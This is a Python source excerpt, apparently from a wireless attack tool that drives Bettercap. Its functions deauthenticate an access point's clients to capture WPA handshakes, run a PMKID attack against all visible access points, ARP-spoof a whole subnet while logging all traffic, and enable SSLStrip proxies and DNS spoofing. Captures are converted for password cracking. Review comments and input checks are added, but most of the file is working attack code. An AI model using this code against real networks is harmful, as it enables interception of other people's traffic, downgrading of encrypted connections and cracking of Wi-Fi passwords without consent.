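def deauth_attack(bssid):
    """Deauthenticate one access point's clients and wait for a handshake capture.

    Points Bettercap's handshake output at a fresh, timestamped .pcap under
    ``./key_material/``, sends deauthentication requests until that file
    appears or ``max_attempts`` requests have been sent, then checks the
    capture by converting it with ``crack.pcap_to_hccapx``.

    Args:
        bssid: Identifier of the target access point. It is concatenated into
            a file name and into a Bettercap command, so it is validated
            before either is built.

    Returns:
        None. Progress and the outcome are printed.
    """
    import re  # local import: the file's import block is not visible from here

    target = str(bssid)
    # Character allow-list: the value ends up in a file path and in a command
    # string, and ';' chains commands in the strings this file sends via
    # post(). Rejecting everything except alphanumerics, ':' and '-' keeps a
    # malformed value from escaping ./key_material/ or appending a command.
    # NOTE(review): tighten to a strict MAC pattern if callers only pass MACs.
    if not re.fullmatch(r'[0-9A-Za-z:-]+', target):
        print('Invalid BSSID, refusing to use it in a path or command: ' +
              repr(target))
        return

    # Unique capture name per run. The original literal './key_material/ '
    # carried a stray space that ended up at the start of the file name.
    stamp = time.strftime("%Y%m%d%H%M%S", time.gmtime())
    handshake_file = './key_material/' + target + '_' + stamp + '.pcap'

    delete_events()  # presumably clears earlier session events; confirm
    post('set wifi.handshakes.file ' + handshake_file)
    print('Launching a deauthentication attack against: ' + target)

    max_attempts = 10
    attempts = 0
    # Stop as soon as the capture file exists, and never send more than
    # max_attempts requests (the original bound allowed max_attempts + 1).
    while attempts < max_attempts and not os.path.isfile(handshake_file):
        print('Access point clients are being deauthenticated...')
        post('wifi.deauth ' + target)
        attempts += 1
        time.sleep(API_COOLDOWN)

    # Give the capture one more cooldown to be written before inspecting it.
    time.sleep(API_COOLDOWN)
    if os.path.isfile(handshake_file):
        # A falsy conversion result means the file lacks a usable handshake.
        if crack.pcap_to_hccapx(handshake_file):
            print('Handshake of ' + target + ' captured successfully.')
            get_handshake_info(handshake_file.split('/')[-1])
        else:
            print('No handshake has been captured with success.')
    else:
        print(
            'Maximum number of attempts reached, no handshake has been captured with success.'
        )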
def request_aps():
    """Return the access points reported by the Bettercap session.

    Turns on the WiFi recon module, reads the ``session/wifi`` endpoint and
    returns the value stored under the ``aps`` key of its JSON body.
    """
    post('wifi.recon on')

    response = get('session/wifi')
    wifi_session = json.loads(response.text)
    return wifi_session['aps']
def get_net_json():
    """Return the LAN hosts reported by the Bettercap session.

    Turns on the network probe, waits one API cooldown, then reads the
    ``session/lan`` endpoint and returns the value under its ``hosts`` key.
    """
    post('net.probe on')
    # One cooldown between enabling the probe and querying the session.
    time.sleep(API_COOLDOWN)

    response = get('session/lan')
    lan_session = json.loads(response.text)
    return lan_session['hosts']
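def pmkid_attack():
    """Request association with every visible access point and report PMKID captures.

    Points Bettercap's handshake output at a fresh, timestamped .pcap under
    ``./key_material/``, enables recon, issues ``wifi.assoc all``, waits two
    API cooldowns, then reports whether a capture file was written and
    converts with ``crack.pcap_to_hccapx``.

    Returns:
        None. The outcome is printed.
    """
    print(
        '\nLaunching a PMKID client-less attack to all visible access points.')

    # A new capture file per run, so an earlier capture is never reported
    # as the result of this one.
    stamp = time.strftime("%Y%m%d%H%M%S", time.gmtime())
    pmkid_file = './key_material/pmkid_keys_' + stamp + '.pcap'

    post('set wifi.handshakes.file ' + pmkid_file)
    post('wifi.recon on')
    post('wifi.assoc all')
    time.sleep(API_COOLDOWN * 2)  # Time needed to associate all APs

    # Single filesystem check: the original tested os.path.isfile() twice, so
    # a file appearing between the two checks could produce no message at all
    # or contradict the first branch.
    captured = os.path.isfile(pmkid_file) and crack.pcap_to_hccapx(pmkid_file)
    if captured:
        print('PMKID keys captured: ' + pmkid_file.split('/')[-1])
    else:
        print(
            'No PMKID key were captured. Not all access points are vulnerable to this attack.'
        )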
def apply_policy(self, new_parameters):
    """Merge a new policy into ``self.parameters`` and push it to Bettercap.

    Only names already present in ``self.parameters`` are updated; unknown
    names are ignored. The AP TTL, station TTL and minimum RSSI settings are
    sent on every call, whether or not any value changed.

    Args:
        new_parameters: Mapping of parameter name to its new value.
    """
    logging.info('[smart] Updating parameters with the new policy.')

    for name, new_value in new_parameters.items():
        # Names the policy does not already track are skipped, not added.
        if name not in self.parameters:
            continue
        if self.parameters[name] == new_value:
            continue
        self.parameters[name] = new_value
        logging.info(f'[smart] Updating {name!s}: {new_value!s}')

    # Bettercap setting -> key in self.parameters, sent in this order.
    settings = (
        ('wifi.ap.ttl', 'ap_ttl'),
        ('wifi.sta.ttl', 'station_ttl'),
        ('wifi.rssi.min', 'min_rssi'),
    )
    for option, key in settings:
        post('set ' + option + ' ' + str(self.parameters[key]))
def arp_spoof(args):
    """Configure and start Bettercap ARP spoofing with traffic capture.

    Reads ``args.target`` ('*' or a target specification), ``args.proxies``
    and ``args.dns``. All sniffed traffic is written to a timestamped .pcap
    under ``./key_material/``. After the modules are started the function
    loops forever, calling ``spoof_summary()`` once per API cooldown, so it
    never returns normally.
    """
    post('net.probe on')

    spoof_all = args.target == '*'
    if spoof_all:
        print('\nARP Spoofing all network clients...')
        # NOTE(review): the wildcard is mapped to a hard-coded 192.168.1.*
        # range, whatever subnet the host is actually on; confirm the scope.
        target_spec = '192.168.1.*'
    else:
        print('\nARP Spoofing ' + args.target + '...')
        # NOTE(review): args.target is concatenated into the command string
        # unvalidated, and ';' chains commands in these strings (see the
        # dns.spoof command below); validate it where the arguments are parsed.
        target_spec = args.target

    post('set arp.spoof.internal true')
    post('set arp.spoof.targets ' + target_spec)

    # Capture file for this run; it holds every sniffed packet.
    stamp = time.strftime("%Y%m%d%H%M%S", time.gmtime())
    pcap_file = './key_material/arp_spoof_' + stamp + '.pcap'
    print('All traffic will be logged at: ' + pcap_file)
    post('set net.sniff.output ' + pcap_file)
    post('set net.sniff.local true')
    time.sleep(API_COOLDOWN)

    # Optional HTTP/HTTPS proxies with SSLStrip enabled.
    if args.proxies:
        print('Deploying HTTP and HTTPS proxies with SSLStrip...')
        for command in ('set http.proxy.sslstrip true',
                        'set https.proxy.sslstrip true',
                        'http.proxy on',
                        'https.proxy on'):
            post(command)

    # Optional DNS spoofing driven by the local dns.spoof.hosts file.
    if args.dns:
        print('Spoofing DNS queries (redirections defined in dns.spoof.hosts file)')
        post('set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on')

    post('arp.spoof on')
    post('net.sniff on')
    print('\nSniffing traffic...')

    # NOTE(review): no teardown is visible here; confirm the caller switches
    # the spoofing, sniffing and proxy modules off when this loop is interrupted.
    while True:
        time.sleep(API_COOLDOWN)
        spoof_summary()